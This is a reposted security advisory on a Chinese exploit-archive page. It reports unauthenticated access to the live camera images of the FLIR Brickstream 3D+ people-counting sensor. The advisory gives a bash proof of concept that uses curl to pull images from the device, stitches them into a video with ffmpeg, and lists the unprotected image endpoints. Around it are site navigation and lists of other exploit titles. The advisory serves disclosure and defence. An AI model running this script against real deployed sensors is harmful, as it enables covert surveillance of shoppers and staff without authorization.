首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 FLIR Brickstream 3D+ - RTSP Stream Disclosure 来源：https://www.zeroscience.mk 作者：LiquidWorm 发布时间：2018-10-16   FLIR Systems FLIR Brickstream 3D+ Unauthenticated RTSP Stream Disclosure     Vendor: FLIR Systems, Inc. Product web page: http://www.brickstream.com Affected version: Firmware: 2.1.742.1842                   Api: 1.0.0                   Node: 0.10.33                   Onvif: 0.1.1.47   Summary: The Brickstream line of sensors provides highly accurate, anonymous information about how people move into, around, and out of physical places. These smart devices are installed overhead inside retail stores, malls, banks, stadiums, transportation terminals and other brick-and-mortar locations to measure people's behaviors within the space.   Desc: The FLIR Brickstream 3D+ sensor is vulnerable to unauthenticated and unauthorized live RTSP video stream access.   Tested on: Titan            Api/1.0.0     Vulnerability discovered by Gjoko 'LiquidWorm' Krstic                             @zeroscience     Advisory ID: ZSL-2018-5496 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5496.php     26.07.2018   --     #!/bin/bash # # PoC: #   echo 'Fetching some images...' for x in {1..10};     do curl http://192.168.2.1:8083/middleImage.jpg -o sequence-$x.jpg -#;     done echo 'Done.' sleep 2 echo 'Generating video...' sleep 2 ffmpeg -r 1 -i sequence-%01d.jpg -c:v libx264 -vf fps=60 -pix_fmt yuv444p counted_people.mp4 echo 'Running generated video...' sleep 2 vlc counted_people.mp4   # # http://192.168.2.1:8083/middleImage.jpg # http://192.168.2.1:8083/rightimage.jpg # http://192.168.2.1:8083/leftimage.jpg # http://192.168.2.1:8083/threeDimage.jpg # http://192.168.2.1:8083/startStopTrafficMapImage.jpg # http://192.168.2.1:8083/dwellTrafficMapImage.jpg # http://192.168.2.1:8083/heightTrafficMapImage.jpg #   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·FLIR AX8 Thermal Camera 1.32.1 ·Academic Timetable Final Build ·Snes9K 0.0.9z - Buffer Overflo ·Any Sound Recorder 2.93 Buffer ·Solaris RSH Stack Clash Privil ·Git Submodule Arbitrary Code E ·NoMachine 5.3.26 Remote Code E ·libSSH - Authentication Bypass ·FluxBB < 1.5.6 - SQL Injection ·Microsoft Windows SetImeInfoEx ·Phoenix Contact WebVisit 29857 ·Modbus Poll 7.2.2 - Denial of   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved